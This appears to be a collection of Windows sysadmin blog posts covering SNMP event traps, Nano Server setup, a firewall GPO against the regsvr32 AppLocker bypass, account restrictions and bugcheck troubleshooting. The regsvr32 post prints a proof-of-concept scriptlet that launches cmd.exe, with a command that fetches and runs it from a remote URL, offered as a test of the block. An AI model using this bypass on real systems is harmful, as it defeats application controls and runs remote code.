Sending SNMP Traps of Windows Events

Furthering my build-out for a monitoring solution which includes Observium as the primary SNMP polling system, I am writing an application to handle SNMP traps from my Windows servers.

Most of my servers are Windows 2008 R2 or Windows 2012 R2. That being said, I can use evntwin.exe on the servers to set up traps for specific event log entries on my Windows servers and send them to my trap receiver, which will further classify them and alert/notify.

There are a few steps involved in the overall process here.

Create a Custom Event Log Source

Before I can translate a specific event log entry, I create an event log source named DevTrap and use an Event ID of 1000. This is optional; as you'll see in the next step, you can dig right in and start translating events from any existing Event Log source.

C:\>eventcreate /T success /id 1000 /l application /d "Test event to be trapped." /so DevTrap

Translate Events to Traps

Using evntwin.exe, I click on Custom and then Edit >>

From here, I can navigate the event log tree in the left pane and find my DevTrap source in the Application log.

Double-clicking the row shows some properties for the event and lets me change when a trap is generated, based on the number of events within a specific time period. I left this at the default since I'll be testing manually and this won't generate hundreds of traps.

Now the event is listed in the Events to be translated to traps box. I need to click Apply and then Export the trap translations. If I wanted to add more events, I could simply keep going before clicking Apply and Export.

When the Export dialog box opens, it asks where to save the configuration for the translations. Choose a location that makes sense. After saving, you can close evntwin.exe.

A Look at events.cnf

The events.cnf file was exported in the previous step. This file contains commands that evntcmd.exe will use to actually apply the translations. Here is what my file contains thus far.

[Screenshot: the exported events.cnf contents]

The format of the #pragma add line is:

#pragma add <LogName> <SourceName> <EventID> <EventCount> <TimeInterval>

I need to add a trap destination and community to this file:

#pragma ADD_TRAP_DEST public 10.147.204.88

I add the line and save my changes and the file looks as follows.

[Screenshot: events.cnf with the ADD_TRAP_DEST line added]

Here is a useful table if you want to build the file manually and include the trap destination. Find more information on the use of evntcmd.exe in Microsoft's TechNet article.

ADD: specifies that you want to add an event-to-trap configuration.
DELETE: specifies that you want to remove an event-to-trap configuration.
DELETE_TRAP_DEST: specifies that you do not want trap messages to be sent to a specified host within a community.
ADD_TRAP_DEST: specifies that you want trap messages to be sent to a specified host within a community.
CommunityName: specifies, by name, the community in which trap messages are sent.
HostID: specifies, by name or IP address, the host to which you want trap messages to be sent.
EventLogFile: specifies the file in which the event is recorded.
EventSource: specifies the application that generates the event.
EventID: specifies the unique number that identifies each event.

Using evntcmd.exe

Now that I have the configuration file as needed, I use evntcmd.exe to configure the trap translations and trap destinations. Run the command from an elevated command prompt.

evntcmd.exe events.cnf

Here is what the output looks like after running the command.

[Screenshot: evntcmd.exe output]

At this point, any event logged in the Application log with source DevTrap and ID 1000 will send a trap to my manager at 10.147.204.88. I can test this by generating an event and watching my trap manager server to make sure I see it come across.

C:\>eventcreate /T success /id 1000 /l application /d "Test event to be trapped." /so DevTrap
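The same procedure as a script, as an added example that is not part of the original post: it writes an events.cnf with the #pragma lines shown above, loads it with evntcmd.exe, checks that the trap destination landed in the SNMP service's configuration, and fires a test event. It assumes the SNMP service and the evntcmd/evntwin tools are installed, that it runs from an elevated PowerShell, and that the manager address and community are the ones from the post (substitute your own). The registry location checked is where the SNMP service keeps its per-community trap destinations; the DevTrap source is registered with New-EventLog if it does not exist yet.

```powershell
# Added example, not from the original post. Assumes an elevated session on a
# server with the SNMP service and evntcmd.exe installed.
$Community = 'public'          # community string from the post
$Manager   = '10.147.204.88'   # trap manager from the post
$CnfPath   = Join-Path $env:TEMP 'events.cnf'

# One entry per "#pragma add": LogName SourceName EventID EventCount TimeInterval.
# EventCount/TimeInterval are the thresholds evntwin lets you edit (1 and 0 = every event).
$Translations = @(
    @{ Log = 'Application'; Source = 'DevTrap'; EventId = 1000; Count = 1; Interval = 0 }
)

[string[]]$lines = @(foreach ($t in $Translations) {
    '#pragma add {0} {1} {2} {3} {4}' -f $t.Log, $t.Source, $t.EventId, $t.Count, $t.Interval
})
$lines += "#pragma ADD_TRAP_DEST $Community $Manager"
# Plain ASCII, no BOM, so evntcmd reads the pragmas cleanly.
[System.IO.File]::WriteAllLines($CnfPath, $lines, [System.Text.Encoding]::ASCII)

Write-Host "Loading trap translations from $CnfPath"
& "$env:SystemRoot\System32\evntcmd.exe" $CnfPath
if ($LASTEXITCODE -ne 0) { throw "evntcmd.exe returned exit code $LASTEXITCODE" }

# Check 1: the destination is now listed under the SNMP service's trap configuration.
# Destinations are stored as numbered values (1, 2, ...) under the community's key.
$trapKey = "HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\TrapConfiguration\$Community"
$dests = (Get-ItemProperty -Path $trapKey -ErrorAction Stop).PSObject.Properties |
    Where-Object { $_.Name -match '^\d+$' } | ForEach-Object Value
if ($dests -notcontains $Manager) { throw "Trap destination $Manager not found under $trapKey" }
Write-Host "Trap destinations for '$Community': $($dests -join ', ')"

# Check 2: log the test event (same log/source/ID as the post) and confirm it was
# written locally; the manager should receive the matching trap.
if (-not [System.Diagnostics.EventLog]::SourceExists('DevTrap')) {
    New-EventLog -LogName Application -Source DevTrap
}
Write-EventLog -LogName Application -Source DevTrap -EventId 1000 -EntryType Information `
    -Message 'Test event to be trapped.'
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'DevTrap'; Id = 1000 } -MaxEvents 1 |
    Format-List TimeCreated, Id, Message
```

Note that SNMPv1/v2c traps carry the community string in cleartext and are not authenticated, so the receiver should only accept traps from the expected source addresses and the community should not be one that also grants read/write access on the agents.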

Batch Script Add Windows Users using Netsh

The following batch script adds a group of users to Windows with no password set and requires a password change at first logon.

@echo off
setlocal enabledelayedexpansion

REM Each variable name (user1, user2, ...) becomes the account name; its value is the full name.
set user1=John Q. Smith
set user2=Jane Doe
set user3=Joe Montana
set user4=Alicia Silverstone

REM Only list variables that are defined above; an undefined one would get an empty full name.
set users=(user1 user2 user3 user4)

REM "echo" prints each command for review; remove it to actually create the accounts.
REM No password is supplied, so the account is created with a blank password and
REM /logonpasswordchg:yes forces a change at first logon.
for %%u in %users% do (
  echo net user %%u /logonpasswordchg:yes /fullname:"!%%u!" /add
)

Join Nano Server to a Domain

To join my Windows Server 2016 Nano Server to my test domain, I used the djoin.exe (Domain Join) command.

From a domain controller, or a server already joined to my domain, I run the following command. This creates a file called NANOSERVERTP5 in the directory where I run the command.

(Change the highlighted items to match your environment.)

djoin.exe /provision /domain TESTDOMAIN /machine NANOSERVERTP5 /reuse /savefile .\NANOSERVERTP5

Copy the NANOSERVERTP5 file to C:\ on the Nano Server. I temporarily allowed File and Printer Sharing through the firewall on the Nano Server to gain access to the administrative share, so I could copy it to \\192.168.100.50\c$.

To enter a remote PowerShell session, I first needed a trusted host entry for my Nano Server in Web Services Management (WS-Management, or WSMan). I launched an administrative PowerShell shell. Also make sure the WinRM service is running on the machine you'll be working from (net start winrm).

(Change the highlighted items to match your environment.)

Set-Item WSMan:\localhost\Client\TrustedHosts -Value 192.168.100.50 -Concatenate

Accept (Y) the WinRM security prompt.

Start a remote PowerShell session into the Nano Server.

Enter-PSSession -ComputerName 192.168.100.50 -Credential Administrator

Run djoin and specify the location the NANOSERVERTP5 file was copied to; in my case, C:\NANOSERVERTP5.

djoin /requestodj /loadfile c:\NANOSERVERTP5 /windowspath c:\windows /localos
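The whole offline domain join flow above as one script, added here as an example rather than taken from the original post. It assumes an elevated PowerShell on a domain member that has djoin.exe, that File and Printer Sharing is allowed through the Nano Server's firewall as in the post, and that the domain, machine name and address are the post's values (TESTDOMAIN, NANOSERVERTP5, 192.168.100.50). The TrustedHosts entry is removed again at the end and the provisioning blob is deleted, because it contains the machine account password.

```powershell
# Added example, not from the original post. Run elevated on a domain-joined host.
$Domain   = 'TESTDOMAIN'
$Machine  = 'NANOSERVERTP5'
$NanoIP   = '192.168.100.50'
$BlobPath = Join-Path $PWD $Machine   # offline domain join (ODJ) blob written by /provision

# Step 1: provision the computer account and write the ODJ blob.
& djoin.exe /provision /domain $Domain /machine $Machine /reuse /savefile $BlobPath
if ($LASTEXITCODE -ne 0) { throw "djoin /provision failed with exit code $LASTEXITCODE" }

# Step 2: copy the blob to C:\ on the Nano Server via its administrative share.
$cred = Get-Credential -UserName 'Administrator' -Message 'Nano Server local Administrator'
New-PSDrive -Name NanoC -PSProvider FileSystem -Root "\\$NanoIP\c$" -Credential $cred | Out-Null
Copy-Item -Path $BlobPath -Destination "NanoC:\$Machine"
Remove-PSDrive -Name NanoC

# Step 3: WinRM cannot verify a non-domain target's identity, so it must be listed in
# TrustedHosts. Add only this one address and restore the previous list afterwards.
$previousTrusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $NanoIP -Concatenate -Force
Test-WSMan -ComputerName $NanoIP -ErrorAction Stop | Out-Null

# Step 4: run the join on the Nano Server itself, then report its exit code.
Invoke-Command -ComputerName $NanoIP -Credential $cred -ArgumentList "C:\$Machine" -ScriptBlock {
    param($blob)
    & djoin.exe /requestodj /loadfile $blob /windowspath $env:SystemRoot /localos
    "djoin /requestodj exit code: $LASTEXITCODE"
}
# A restart of the Nano Server is required before the join takes effect.

# Step 5: put TrustedHosts back and remove the blob (it holds the machine account secret).
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $previousTrusted -Force
Remove-Item $BlobPath -Force
```

Restart the Nano Server after the script completes; until then the machine account exists in the domain but the server is not yet using it.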

Create Nano Server Image

I was trying to build a Nano Server image (2016 Tech Preview 5) and kept getting the following error:

[Screenshot: New-NanoServerImage error]

It turns out the documentation was out of date: instead of -GuestDrivers, the cmdlet now uses:

  1. -Edition [ Standard | Datacenter]
  2. -DeploymentType [ Guest | Host ]

The following updated command builds the image without issue.

(Change the highlighted items to match your environment.)

New-NanoServerImage -MediaPath c:\tp5iso -BasePath .\Base -TargetPath .\Nano1\Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard

Add Packages

You can add packages to the image that is being built by specifying -Packages [PackageName].

To install IIS, for example:
(Change the highlighted items to match your environment.)

New-NanoServerImage -MediaPath c:\tp5iso -BasePath .\Base -TargetPath .\Nano1\Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard -Packages Microsoft-NanoServer-IIS-Package

Here's a listing of the packages in the Server 2016 TP5 ISO as of this writing.

I used the following command within the Packages directory of the Nano distribution to generate this.

PS C:\users\rkreider\desktop\nano\base\Packages> gci . -filter *.cab | foreach-object { write-output $_.basename; dism /online /get-packageinfo /packagepath:$_ | select-string "Description|Product Name|^Name :"; }
  • Microsoft-NanoServer-BootFromWim-Package
    Description : Boot from WIM support
    Name : Boot from WIM support
    Product Name : Microsoft-NanoServer-BootFromWim-Feature-Package
  • Microsoft-NanoServer-Compute-Package
    Description : Hyper-V provides the services that you can use to create and manage virtual machines and their resources. Each virtual machine is a virtualized computer system that operates in an isolated execution environment. This allows you to run multiple operating systems simultaneously.
    Name : Hyper-V
    Product Name : Microsoft-NanoServer-Compute-Feature-Package
  • Microsoft-NanoServer-Containers-Package
    Description : Provides services and tools to create and manage Windows Server Containers and their resources.
    Name : Containers
    Product Name : Microsoft-NanoServer-Containers-Feature-Package
  • Microsoft-NanoServer-DCB-Package
    Description : Data Center Bridging (DCB) is a suite of IEEE standards that are used to enhance Ethernet local area networks by providing hardware-based bandwidth guarantees and transport reliability. Use DCB to help enforce bandwidth allocation on a Converged Network Adapter for offloaded storage traffic such as Internet Small Computer System Interface, RDMA over Converged Ethernet, and Fibre Channel over Ethernet.
    Name : Data Center Bridging
    Product Name : Microsoft-NanoServer-DCB-Feature-Package
  • Microsoft-NanoServer-Defender-Package
    Description : Windows Server Antimalware helps protect your machine from malware.
    Name : Windows Server Antimalware
    Product Name : Microsoft-NanoServer-Defender-Feature-Package
  • Microsoft-NanoServer-DNS-Package
    Description : Domain Name System (DNS) Server provides name resolution for TCP/IP networks. DNS Server is easier to manage when it is installed on the same server as Active Directory Domain Services. If you select the Active Directory Domain Services role, you can install and configure DNS Server and Active Directory Domain Services to work together.
    Name : DNS Server
    Product Name : Microsoft-NanoServer-DNS-Feature-Package
  • Microsoft-NanoServer-DSC-Package
    Description : Windows PowerShell Desired State Configuration is a configuration management platform that uses a declarative syntax to express and enact system configuration state.
    Name : Windows PowerShell Desired State Configuration
    Product Name : Microsoft-NanoServer-DSC-Feature-Package
  • Microsoft-NanoServer-FailoverCluster-Package
    Description : Failover Clustering allows multiple servers to work together to provide high availability of server roles. Failover Clustering is often used for File Services, virtual machines, database applications, and mail applications.
    Name : Failover Clustering Service
    Product Name : Microsoft-NanoServer-FailoverCluster-Feature-Package
  • Microsoft-NanoServer-Guest-Package
    Description : Hyper-V guest drivers for using Nano Server as a virtual machine
    Name : Hyper-V guest drivers
    Product Name : Microsoft-NanoServer-Guest-Feature-Package
  • Microsoft-NanoServer-Host-Package
    Description : Support for bare metal deployments
    Name : Bare metal deployment
    Product Name : Microsoft-NanoServer-Host-Feature-Package
  • Microsoft-NanoServer-IIS-Package
    Description : Web Server (IIS) provides a reliable, manageable, and scalable Web application infrastructure.
    Name : Web Server (IIS)
    Product Name : Microsoft-NanoServer-IIS-Feature-Package
  • Microsoft-NanoServer-NPDS-Package
    Description : Network Performance Diagnostics Service (NPDS)
    Name : Network Performance Diagnostics Service (NPDS)
    Product Name : Microsoft-NanoServer-NPDS-Feature-Package
  • Microsoft-NanoServer-OEM-Drivers-Package
    Description : Server Core drivers
    Name : Server Core drivers
    Product Name : Microsoft-NanoServer-OEM-Drivers-Feature-Package
  • Microsoft-NanoServer-SCVMM-Compute-Package
    Description : System Center Virtual Machine Manager Hyper-V agent
    Name : System Center Virtual Machine Manager Hyper-V agent
    Product Name : Microsoft-NanoServer-SCVMM-Compute-Feature-Package
  • Microsoft-NanoServer-SCVMM-Package
    Description : System Center Virtual Machine Manager agent
    Name : System Center Virtual Machine Manager agent
    Product Name : Microsoft-NanoServer-SCVMM-Feature-Package
  • Microsoft-NanoServer-SecureStartup-Package
    Description : Secure Startup support
    Name : Secure Startup support
    Product Name : Microsoft-NanoServer-SecureStartup-Feature-Package
  • Microsoft-NanoServer-ShieldedVM-Package
    Description : Host Guardian provides the features necessary on a Hyper-V server to provision Shielded Virtual Machines.
    Name : Shielded VM support
    Product Name : Microsoft-NanoServer-ShieldedVM-Feature-Package
  • Microsoft-NanoServer-Storage-Package
    Description : File Server role and other storage components
    Name : File Server role and other storage components
    Product Name : Microsoft-NanoServer-Storage-Feature-Package

GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently discovered method of bypassing AppLocker by using regsvr32.exe poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions). To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO named Firewall: Block regsvr32 and then edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

Create a new inbound rule to block regsvr32.exe.

Inbound Rule Wizard

Choose Program as the type of rule to create and click Next >.

Use C:\windows\system32\regsvr32.exe as the path; you can either type it in or click Browse... to navigate to it and select it.

Choose Block as the action and click Next >.

Apply it to all network locations.

Give the rule a name and possibly a description.

The block rule is now listed under Inbound Rules.

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new rule under Outbound Rules.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force immediate application of the security group policy.

I'll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file yourself (it doesn't have to have the .SCT extension; it can be anything).

backdoor.sct

<?XML version="1.0"?>
<scriptlet>
<registration
 progid="Empire"
 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language="JScript">
 <![CDATA[

 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO you created is not blocking it (for one reason or another; double-check your work).
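The same inbound and outbound block rules created with PowerShell and then verified, as an added example that is not part of the original post. By default it writes to the local firewall (PersistentStore); to populate the post's GPO instead, pass -PolicyStore in the Domain\GPOName form that New-NetFirewallRule accepts, for example 'yourdomain.local\Firewall: Block regsvr32' (a placeholder). One addition beyond the post: on 64-bit Windows the 32-bit copy in SysWOW64 is a separate binary, so the example blocks both paths. Run it elevated.

```powershell
# Added example, not from the original post. Assumes an elevated session with the
# NetSecurity module (Windows 8 / Server 2012 and later).
param(
    # 'PersistentStore' = local firewall; 'DOMAIN\GPO Name' (placeholder) = write into a GPO.
    [string]$PolicyStore = 'PersistentStore'
)

# The post blocks System32\regsvr32.exe; SysWOW64 holds the 32-bit build on x64 systems.
$Programs = @{
    System32 = '%SystemRoot%\System32\regsvr32.exe'
    SysWOW64 = '%SystemRoot%\SysWOW64\regsvr32.exe'
}

foreach ($entry in $Programs.GetEnumerator()) {
    foreach ($dir in 'Inbound', 'Outbound') {
        $name = "Block regsvr32 ($($entry.Key), $dir)"
        # Idempotent: skip rules that already exist in this store.
        if (Get-NetFirewallRule -DisplayName $name -PolicyStore $PolicyStore -ErrorAction SilentlyContinue) {
            continue
        }
        New-NetFirewallRule -DisplayName $name -Direction $dir -Action Block -Program $entry.Value `
            -Profile Any -Enabled True -PolicyStore $PolicyStore `
            -Description 'Prevents regsvr32.exe from reaching remote scriptlets (AppLocker bypass mitigation).' |
            Out-Null
    }
}

# Verify: every rule, its direction/action, and the program filter it applies to.
Get-NetFirewallRule -DisplayName 'Block regsvr32*' -PolicyStore $PolicyStore | ForEach-Object {
    $app = $_ | Get-NetFirewallApplicationFilter
    [pscustomobject]@{
        Rule      = $_.DisplayName
        Direction = $_.Direction
        Action    = $_.Action
        Enabled   = $_.Enabled
        Program   = $app.Program
    }
} | Format-Table -AutoSize
```

Keep in mind what this rule does and does not cover: it stops regsvr32.exe from fetching a scriptlet over the network, which is the test in the post, but it does not stop regsvr32 loading a scriptlet that is already on disk. For that, AppLocker/WDAC rules and monitoring of regsvr32.exe launched with scrobj.dll in its command line are the complementary controls, and the firewall's dropped-packet log (if enabled) will show the blocked attempts.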

Disable Server 2008 TCP Chimney Offload

TCP Chimney Offload is a networking technology that helps transfer the workload from the CPU to a network adapter during network data transfer. In Windows Server 2008, TCP Chimney Offload enables the Windows networking subsystem to offload the processing of a TCP/IP connection to a network adapter that includes special support for TCP/IP offload processing.

TCP Chimney Offload is available in all versions of Windows Server 2008 and Windows Vista. Both TCP/IPv4 connections and TCP/IPv6 connections can be offloaded if the network adapter supports this feature.

Disable TCP Chimney Offload from command line:

netsh int tcp set global chimney=disabled

The above command disables TCP Chimney Offload for the operating system.

Restrict Access to Only Email/OWA Access

An existing user in our Windows domain was moving to the parent company, which is not part of our infrastructure. After the employee left, his account was to be cut off from everything except email: no local or remote logon to systems or computers on the network.

Disabling the account would also block the authentication Exchange needs, so that was not an option.

Create a Security Group

I created a new Security Group, Email Only.

I added this specific user to the newly created Security Group.

Create a Group Policy

Next, I created a new Group Policy for the domain and applied it to the Computers OU.

Group Policy:  Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Deny Log on Locally

I modified the Deny Log on Locally policy and added my newly created Security Group, Email Only.

Testing

To test functionality, I logged on as an administrator to a PC in the domain and ran gpupdate /force, which updates the group policy on that computer. Then I logged off and tried logging back on as the user I had added to the Security Group. Login failed, so this worked.

Next, I tested OWA, Outlook Anywhere, and Outlook.  I was able to successfully authenticate and send/receive email without an issue.

Now this user has access to OWA and Outlook Anywhere or Outlook without the ability to log on locally to a computer in the domain.
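A verification script for the setup above, added as an example that is not part of the original post: run on a domain-joined PC after gpupdate, it exports the effective local security policy with secedit, checks whether the Email Only group's SID is present in the Deny log on locally right, and confirms the user is actually a member of the group. It also reports the separate Deny log on through Remote Desktop Services right, because the post only sets the local-logon one and RDP is governed by the other. Assumptions: elevated session, the ActiveDirectory RSAT module for the membership check, and the group/user names are placeholders to replace.

```powershell
# Added example, not from the original post. Run elevated on a domain-joined PC.
param(
    [string]$GroupName = 'Email Only',   # group name from the post
    [string]$UserName  = 'jdoe'          # placeholder sAMAccountName of the restricted user
)

# Export the effective policy; user rights live in the [Privilege Rights] section as
# "SeRightName = *S-1-5-...,*S-1-5-..." lines.
$inf = Join-Path $env:TEMP 'secpol-export.inf'
& secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
$text = Get-Content -Path $inf -Raw
Remove-Item -Path $inf -Force

# SeDenyInteractiveLogonRight       = "Deny log on locally" (what the post sets)
# SeDenyRemoteInteractiveLogonRight = "Deny log on through Remote Desktop Services"
$rights = 'SeDenyInteractiveLogonRight', 'SeDenyRemoteInteractiveLogonRight'

# Resolve the group to its SID, since the export lists SIDs rather than names.
$groupSid = (New-Object System.Security.Principal.NTAccount($GroupName)).Translate(
    [System.Security.Principal.SecurityIdentifier]).Value

foreach ($right in $rights) {
    $match = [regex]::Match($text, "(?m)^$right\s*=\s*(.*)$")
    $sids = if ($match.Success) {
        $match.Groups[1].Value -split ',' | ForEach-Object { $_.Trim().TrimStart('*') }
    } else { @() }
    [pscustomobject]@{
        Right         = $right
        ContainsGroup = ($sids -contains $groupSid)
        Principals    = ($sids -join ', ')
    }
}

# The deny right only applies if the user really is in the group (directly or nested).
Import-Module ActiveDirectory
$member = Get-ADGroupMember -Identity $GroupName -Recursive | Where-Object SamAccountName -eq $UserName
[pscustomobject]@{ User = $UserName; InGroup = [bool]$member }
```

If ContainsGroup is false for SeDenyInteractiveLogonRight on a machine in the Computers OU, the policy has not applied there yet (check gpresult /r for the GPO); a false for the Remote Desktop right simply reflects that the post did not set it.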

Exchange 2003 Transition to Exchange 2013

This post will be updated as time passes and I continue working on this project.

I am setting up a virtual lab to replicate an existing environment which contains Server 2003 Domain Controller/DNS/DHCP and Server 2003 with Exchange 2003.

The goal is to determine the best possible path to transition from Exchange 2003 to Exchange 2013. The two scenarios I know of are a transition from Exchange 2003 to Exchange 2010 and then from Exchange 2010 to Exchange 2013, or exporting individual user mailboxes to PST and importing them into Exchange 2013.

Phase 1

I will set up a 2008 R2 virtual server, install a 180-day trial of Exchange 2010 on it, and put it into this VM lab environment to start the transition process. Afterward, I will remove Exchange 2003 from the domain completely.

Next will be the transition from Exchange 2010 to Exchange 2013, followed by removing Exchange 2010 from the domain completely.

  • Set up Windows 2003 domain
  • Set up Windows 2003 + Exchange 2003
  • Install 2008 R2 SP1
  • Install and run Exchange Pre-Deployment Analyzer (2010) (Link)
    • Raise domain functional level to 2003 native
    • Raise forest functional level to 2003 native
    • Modify the Exchange 2003 server: under the registry key HKLM\System\CurrentControlSet\Services\RESvc\Parameters add a DWORD value SuppressStateChanges set to 1
    • Install .NET 3.5 on 2008 R2 SP1 server for Exchange 2010 pre-requisite
  • Install Exchange 2010 SP3
    • Run setup with the following switches
      • setup.com /PrepareLegacyExchangePermissions
      • setup.com /PrepareSchema
      • setup.com /PrepareAD
      • setup.com /PrepareDomain
    • Start Graphical Setup (setup.exe)
  • Determine Transition Path from 2003 to 2010 Exchange

Phase 2

Export the users' mailboxes. Remove Exchange 2003 from the domain. Set up Server 2008 R2 and install Exchange 2013 in the domain. This phase should be fun.

Windows Server 2012 R2 RTM (CRITICAL_STRUCTURE_CORRUPTION)

Receiving a BSOD on a fresh Windows Server 2012 RTM install while processing updates. This is a Hyper-V VM.

Windbg Analysis

0: kd> .bugcheck
Bugcheck code 00000109
Arguments a3a01f58`921465fa b3b72bde`e4946739 00000000`000001a0 00000000`00000007
0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

CRITICAL_STRUCTURE_CORRUPTION (109)
This bugcheck is generated when the kernel detects that critical kernel code or
data have been corrupted. There are generally three causes for a corruption:
1) A driver has inadvertently or deliberately modified critical kernel code
 or data. See http://www.microsoft.com/whdc/driver/kernel/64bitPatching.mspx
2) A developer attempted to set a normal kernel breakpoint using a kernel
 debugger that was not attached when the system was booted. Normal breakpoints,
 bp, can only be set if the debugger is attached at boot time. Hardware
 breakpoints, ba, can be set at any time.
3) A hardware corruption occurred, e.g. failing RAM holding kernel code or data.
Arguments:
Arg1: a3a01f58921465fa, Reserved
Arg2: b3b72bdee4946739, Reserved
Arg3: 00000000000001a0, Failure type dependent information
Arg4: 0000000000000007, Type of corrupted region, can be
	0 : A generic data region
	1 : Modification of a function or .pdata
	2 : A processor IDT
	3 : A processor GDT
	4 : Type 1 process list corruption
	5 : Type 2 process list corruption
	6 : Debug routine modification
	7 : Critical MSR modification

Debugging Details:
------------------


PG_MISMATCH:  40000

DEFAULT_BUCKET_ID:  WIN8_DRIVER_FAULT

BUGCHECK_STR:  0x109

PROCESS_NAME:  mscorsvw.exe

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) amd64fre

DPC_STACK_BASE:  FFFFF80049477FB0

STACK_TEXT:
fffff800`494778a8 00000000`00000000 : 00000000`00000109 a3a01f58`921465fa b3b72bde`e4946739 00000000`000001a0 : nt!KeBugCheckEx


STACK_COMMAND:  kb

SYMBOL_NAME:  ANALYSIS_INCONCLUSIVE

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Unknown_Module

IMAGE_NAME:  Unknown_Image

DEBUG_FLR_IMAGE_TIMESTAMP:  0

IMAGE_VERSION:

BUCKET_ID:  BAD_STACK

FAILURE_BUCKET_ID:  BAD_STACK

ANALYSIS_SOURCE:  KM

FAILURE_ID_HASH_STRING:  km:bad_stack

FAILURE_ID_HASH:  {75814664-faf6-4b70-bbc7-dc592132ecdd}

Followup: MachineOwner
---------
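Reading the Arg4 table from the !analyze output above can be done without attaching WinDbg: after a bugcheck, Windows logs Event ID 1001 (source BugCheck, provider Microsoft-Windows-WER-SystemErrorReporting) in the System log with the code and its four arguments. The following is an added example, not from the original post, that parses that message and maps Arg4 for a 0x109 to the corruption-region names listed above. The sample message is constructed from the argument values in the post's .bugcheck output; the trailing Get-WinEvent call decodes any real occurrences on the machine it runs on.

```powershell
# Added example, not from the original post. Arg4 meanings are the ones listed in the
# !analyze -v output for CRITICAL_STRUCTURE_CORRUPTION (0x109).
$Arg4Types = @{
    0 = 'A generic data region'
    1 = 'Modification of a function or .pdata'
    2 = 'A processor IDT'
    3 = 'A processor GDT'
    4 = 'Type 1 process list corruption'
    5 = 'Type 2 process list corruption'
    6 = 'Debug routine modification'
    7 = 'Critical MSR modification'
}

function ConvertFrom-BugcheckMessage {
    param([Parameter(Mandatory)][string]$Message)
    # Event 1001 text: "... The bugcheck was: 0x00000109 (0x..., 0x..., 0x..., 0x...). ..."
    $m = [regex]::Match($Message,
        'bugcheck was: 0x([0-9A-Fa-f]+) \((0x[0-9A-Fa-f]+), (0x[0-9A-Fa-f]+), (0x[0-9A-Fa-f]+), (0x[0-9A-Fa-f]+)\)')
    if (-not $m.Success) { return $null }

    $code = [Convert]::ToUInt32($m.Groups[1].Value, 16)
    $vals = 2..5 | ForEach-Object { [Convert]::ToUInt64($m.Groups[$_].Value.Substring(2), 16) }

    $out = [ordered]@{
        Code = ('0x{0:X}' -f $code)
        Arg1 = ('0x{0:x16}' -f $vals[0])
        Arg2 = ('0x{0:x16}' -f $vals[1])
        Arg3 = ('0x{0:x16}' -f $vals[2])
        Arg4 = ('0x{0:x16}' -f $vals[3])
    }
    if ($code -eq 0x109) {
        # Arg4 = type of corrupted region, per the table above.
        $key = [int]$vals[3]
        $out['Region'] = if ($Arg4Types.ContainsKey($key)) { $Arg4Types[$key] } else { 'Unknown' }
    }
    [pscustomobject]$out
}

# Constructed sample using the argument values from the post's ".bugcheck" output.
$sample = 'The computer has rebooted from a bugcheck. The bugcheck was: 0x00000109 ' +
          '(0xa3a01f58921465fa, 0xb3b72bdee4946739, 0x00000000000001a0, 0x0000000000000007). ' +
          'A dump was saved in: C:\Windows\MEMORY.DMP.'
ConvertFrom-BugcheckMessage -Message $sample | Format-List
# Region resolves to 'Critical MSR modification' for this sample (Arg4 = 7).

# Live use: decode every bugcheck event recorded in this machine's System log.
Get-WinEvent -FilterHashtable @{
    LogName = 'System'; ProviderName = 'Microsoft-Windows-WER-SystemErrorReporting'; Id = 1001
} -ErrorAction SilentlyContinue |
    ForEach-Object { ConvertFrom-BugcheckMessage -Message $_.Message } |
    Where-Object { $_ } | Format-Table -AutoSize
```

Seeing the same Region value repeat across crashes on a fleet narrows the search: type 7 (MSR modification) on a Hyper-V guest, as in this post, points at something altering processor state underneath the kernel's PatchGuard checks, which is why the post's next step of isolating which update introduces it is the right one.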

Update 1: Applying Security Updates

I decided to apply just Security Updates right now. So far so good.

After that completed, these are the remaining updates for this pass.

[Screenshot: remaining updates]

I will install these on a one-by-one basis.

Interestingly enough, that first update (685KB) failed to install; I re-checked for updates and there was only one update (9.6MB), so I assume it was a roll-up. Anyway, it installed fine.

Now, I re-checked updates and I have a Windows 2012 R2 Update (~800MB).

Working on installing this now.

That update installed; I ran a check and found additional updates, which installed as well.

One last update remained (97MB); it installed and rebooted seemingly OK.

After the prompt to restart, I got the following error on boot, though:

[Screenshot: error on boot]

It booted back into Windows OK, but I see the update did not install.

This update is the Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 update rollup: May 2014

The listed prerequisite is KB2919355.

Checking system for KB2919355 shows I have it:

[Screenshot: KB2919355 shown as installed]

Re-attempting to install this update.

Resolution

All updates installed; however, I am still getting a bugcheck code of 0x109 at random.